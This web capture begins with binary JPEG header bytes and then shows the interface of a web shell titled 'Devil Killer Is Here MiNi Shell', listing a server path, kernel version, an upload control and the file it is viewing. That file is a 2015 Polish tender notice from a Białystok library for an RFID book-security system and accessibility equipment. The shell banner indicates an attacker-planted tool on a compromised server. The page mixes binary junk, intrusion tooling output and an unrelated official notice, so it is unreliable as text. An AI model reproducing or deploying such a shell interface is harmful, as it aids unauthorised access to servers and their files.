JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151112/305508-N-2015.html

<p class="kh_header"><b>Białystok: Przedmiotem zamówienia jest: zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi priorytetowej VI Rozwój infrastruktury społecznej, Działanie 6.3 Rozwój infrastruktury z zakresu kult</b><br>
<b>Numer ogłoszenia: 305508 - 2015; data zamieszczenia: 12.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Książnica Podlaska im. Łukasza Górnickiego , ul. Kilińskiego 16, 15-089 Białystok, woj. podlaskie, tel. 85 6767224, faks 85 6767220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ksiaznicapodlaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest: zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi priorytetowej VI Rozwój infrastruktury społecznej, Działanie 6.3 Rozwój infrastruktury z zakresu kult.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi priorytetowej VI Rozwój infrastruktury społecznej, Działanie 6.3 Rozwój infrastruktury z zakresu kultury i ochrony dziedzictwa historycznego i kulturowego. 
Cz. 1
Bramka nadawczo-odbiorcza RFID; Inteligentny licznik osób odwiedzających zintegrowany z antenami bramek RFID; Przygotowanie wygrodzenia przy wejściu do biblioteki razem z bramkami RFID; Stanowisko wypożyczeń i zwrotów oraz kodowania etykiet przez bibliotekarza - zawiera czytnik/programator RFID, urządzenie jest ekranowane; Czytnik kart typu Mifare; etykiety biblioteczne RFID; Mobilne skontrum RFID; Przemysłowa drukarka termotransferowa; Montaż urządzeń, Konfiguracja systemu, Wdrożenie informatyczne; Wrzutnia RFID zewnętrzna przystosowana do potrzeb osób niepełnosprawnych; Stanowisko samodzielnego wypożyczania RFID wolnostojące przystosowane do potrzeb osób niepełnosprawnych.
Cz. 2
Lupa przenośna; Lupa stała; Zestaw komputerowy; Multilektor; Program, w którym dostępna będzie funkcja: powiększająca, udźwiękowiająca i ubrajlawiający środowisko operacyjne.
Szczegółowy opis zamówienia dla Cz. 1 i Cz. 2 został określony załączniku Nr 1 do SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.80.00-6, 42.96.11.00-1, 48.73.00.00-4, 31.71.00.00-6, 48.00.00.00-8, 48.16.10.00-4, 48.16.00.00-7, 51.61.11.00-9, 39.15.51.00-4, 80.51.00.00-2, 33.19.62.99-2, 30.23.00.00-0, 30.21.33.00-8, 30.21.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 
Cz. 1 - 17 000,00 zł (słownie: siedemnaście tysięcy złotych).
Cz. 2 - 1800 zł (słownie: jeden tysiąc osiemset złotych).
    Wadium może być wnoszone wg wyboru wykonawcy w jednej lub w kilku następujących
    formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: PKO BANK POLSKI  SA 33 1020 1332 0000 1202 0930 5295
          Wykonawcy - wnosząc wadium - powinni podać numer sprawy, nazwę zamówienia oraz wskazać, której części zamówienia dotyczy tj. K.331-5/2015 Zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz
Wadium część I
lub
Wadium część II</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 Pzp, złożonego przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Cz.1
Zamawiający uzna warunek za spełniony, jeżeli wykonawca należycie wykonał (a w przypadku świadcz wen okresowych lub ciągłych wykonuje) w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia przez niego działalności jest krótszy - w tym okresie:
-  	minimum trzy dostawy systemów ochrony zbiorów bibliotecznych na kwotę min. 500 tyś zł brutto każda odprowadzające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. 
Poprzez zamówienie odpowiadające przedmiotowi zamówienia należy rozumieć należycie zrealizowaną dostawę i montaż systemu ochrony zbiorów w jednorodnej technologii RFID HF obejmującym minimum:
- bramkę nadawczo-odbiorczą
- stanowisko wypożyczania i zwrotów przez bibliotekarza
- mobilne stanowisko do skontrum
- stanowisko do samodzielnego wypożyczania
- wrzutnia mechaniczna do samodzielnych zwrotów
oraz 
-	dostaw minimum 300 tysięcy etykiet bibliotecznych RFID HF (zamawiający wymaga wykazania dostarczenia w ciągu ostatnich trzech lat minimum 300 tysięcy sztuk etykiet RFID HF w taki sposób, żeby w każdej dostawie wykazanej w wykazie dostarczonych było minimum 150 tysięcy sztuk etykiet zaś suma etykiet dostarczona w ramach wszystkich wykazanych w wykazie dostaw był nie mniejsza niż 300 tysięcy). Wykonawca ma prawo wykazania dostaw etykiet realizowanych łącznie z systemami ochrony zbiorów bibliotecznych wskazanymi w wykazie lub odrębnych dostaw obejmujących wyłącznie etykiety biblioteczne RFID HF

Cz. 2
Zamawiający dla Części II nie dokonuje opisu sposobu oceny spełniania tego warunku. Wykonawca zobligowany jest złożyć w tym zakresie jedynie oświadczenie o spełnianiu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 Pzp, złożonego przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 Pzp, złożonego przez Wykonawcę</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 Pzp, złożonego przez Wykonawcę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>w wykazie należy wskazać dla części 1 - minimum trzy dostawy systemów ochrony zbiorów bibliotecznych na kwotę min. 500 tyś zł brutto każda odprowadzające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. 
Poprzez zamówienie odpowiadające przedmiotowi zamówienia należy rozumieć należycie zrealizowaną dostawę i montaż systemu ochrony zbiorów w jednorodnej technologii RFID HF obejmującym minimum:
- bramkę nadawczo-odbiorczą
- stanowisko wypożyczania i zwrotów przez bibliotekarza
- mobilne stanowisko do skontrum
- stanowisko do samodzielnego wypożyczania
- wrzutnia mechaniczna do samodzielnych zwrotów
oraz 
-	dostaw minimum 300 tysięcy etykiet bibliotecznych RFID HF (zamawiający wymaga wykazania dostarczenia w ciągu ostatnich trzech lat minimum 300 tysięcy sztuk etykiet RFID HF w taki sposób, żeby w każdej dostawie wykazanej w wykazie dostarczonych było minimum 150 tysięcy sztuk etykiet zaś suma etykiet dostarczona w ramach wszystkich wykazanych w wykazie dostaw był nie mniejsza niż 300 tysięcy). Wykonawca ma prawo wykazania dostaw etykiet realizowanych łącznie z systemami ochrony zbiorów bibliotecznych wskazanymi w wykazie lub odrębnych dostaw obejmujących wyłącznie etykiety biblioteczne RFID HF;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla części I
a)	opis systemu oraz karty katalogowe oferowanych urządzeń zgodne z wymogami zamieszczonymi w SIWZ - lub dokument równoważny
b)	certyfikat ISO 9001:2009 - na projektowanie, tworzenie, sprzedaż i wdrażanie systemów techniczno-informatycznych - lub równoważny, 
c)	 próbki 5 szt. oferowanych etykiet bibliotecznych zgodnych z wymogami zamieszczonymi w SIWZ celem dokonania oceny pod względem technicznym, jakościowym i użytkowym. Po zakończonym postępowaniu przetargowym próbki zostaną zwrócone Wykonawcom na ich wniosek. Zwrot próbek nie dotyczy Wykonawcy, który zostanie wyłoniony w postępowaniu przetargowym do realizacji zadania. 
d)	oświadczenie o użyczeniu na okres 6 miesięcy pięciu stanowisk do kodowania etykiet RFID, w celu przygotowania zbiorów (w cenie oferty).

Dla części II (dokumenty żądane jedyne w zakresie dostaw jednostek komputerowych typu AIO)

a)	oświadczenie producenta opisujące głośność jednostki centralnej mierzonej zgodnie z normą ISO 7779 oraz wykazanej zgodnie z normą ISO 9296 w pozycji obserwatora w trybie pracy dysku twardego (IDLE) wynoszącą maksymalnie 18 dB - lub dokument równoważny 
b)	dokumenty potwierdzające autoryzację producenta komputera dla firmy serwisującej
c)	Certyfikat potwierdzający posiadanie przez firmę serwisującą systemu zarządzania jakością ISO 9001:2000 na świadczenie usług serwisowych - lub równoważny
d)	należy dołączyć link do strony internetowej, na której Zamawiający uzyska dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie numeru seryjnego lub modelu komputera
e)	Certyfikat potwierdzający posiadanie przez producenta systemu zarządzania jakością ISO 9001:2000 na proces produkcji - lub równoważny 
f)	Deklaracja zgodności CE 
g)	Komputer musi spełniać wymogi normy Energy Star 5.2 lub równoważny Do oferty należy dołączyć wydruk ze strony internetowej dotyczący wpisu oferowanego komputera w  internetowym katalogu http://www.eu-energystar.org lub http://www.energystar.gov potwierdzający spełnianie wymogu - lub dokument równoważny
h)	Oświadczenia podmiotu realizującego serwis lub producenta, że w przypadku awarii dysków twardych dysk pozostaje u Zamawiającego lub dokument równoważny potwierdzający wymogi zamawiającego
Ponadto do oferty należy załączyć:
1)	Wykaz integracji oferowanej technologii RFID HF z systemami bibliotecznymi - wzór załącznik nr 8 do SIWZ 
2)	formularz oferty, sporządzony na podstawie wzoru stanowiącego wzór formularza oferty - załącznik Nr 5 do SIWZ. W części stanowiącej załącznik do oferty wykonawca powinien w kolumnie Opis techniczny podać dane techniczne proponowanego sprzętu (typ, model, producent)
3)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, oraz stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający, zgodnie z art. 144 ust.1 Pzp , przewiduje możliwość istotnej zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru oferty w zakresie terminów jej wykonania lub w zakresie dostaw, w następujących okolicznościach:
a)	zmiany przedstawicieli stron umowy,
b)	przedłużenia terminu wykonania zamówienia z przyczyn niezawinionych przez Wykonawcę o czas niezbędny do należytego wykonania zamówienia, jednakże nie dłuższy niż czas trwania okoliczności je powodujących,
c)	w przypadku zaistnienia okoliczności leżących  po stronie Zamawiającego, dotyczących braku przygotowania/przekazania miejsca realizacji dostawy,
d)	nie leżących po stronie Wykonawcy, gdy wykonywanie zamówienia nie było możliwe lub Wykonawca miał w istotny sposób utrudnione możliwości w spełnianiu świadczenia, (Wykonawca może zwrócić się do Zamawiającego z uzasadnionym wnioskiem o przedłużenie terminu wykonania zamówienia)
e)	jeżeli konieczność zmiany jest spowodowana wystąpieniem niezależnych od stron okoliczności, których nie można było przy dołożeniu należytej staranności przewidzieć w chwili zawarcia umowy, a które uniemożliwiają prawidłową realizację przedmiotu umowy zgodnie z jej postanowieniami
f)	zmniejszenia z uwagi na uzasadnione potrzeby Zamawiającego, zakresu dostaw wraz z proporcjonalnym zmniejszeniem wynagrodzenia,
g)	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, kwestiami organizacyjnymi, które nie były możliwe do przewidzenia w chwili zawarcia umowy.
W powyższych przypadkach ewentualne zmiany umowy zostaną dokonane w drodze pisemnego aneksu do   niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ksiaznicapodlaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Książnica Podlaska im. Łukasza Górnickiego ul. Kilińskiego 16 , 15-089 Białystok, sekretariat p. I.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2015 godzina 10:00, miejsce: Książnica Podlaska im. Łukasza Górnickiego w Białymstoku ul. Kilińskiego 11
pok. nr 7, III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest realizowany w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych 
w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego na lata 2007 - 2013  w ramach Osi priorytetowej VI Rozwój infrastruktury społecznej, Działanie 6.3 Rozwój infrastruktury z zakresu kultury i ochrony dziedzictwa historycznego 
i kulturowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zakup systemu zabezpieczenia i kontroli zbiorów działającego w technice RFID (Radio Frequency Identification) 13,56 MHz, w skład którego wchodzi dostawa, montaż oraz wdrożenie informatyczne w siedzibie Zamawiającego w ramach realizacji projektów: Zabezpieczenia zbiorów bibliotecznych w technice radiowej identyfikacji - RFID oraz Kultura bez barier -projekty finansowane w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego  w ramach Osi priorytetowej VI Rozwój infrastruk.</p>
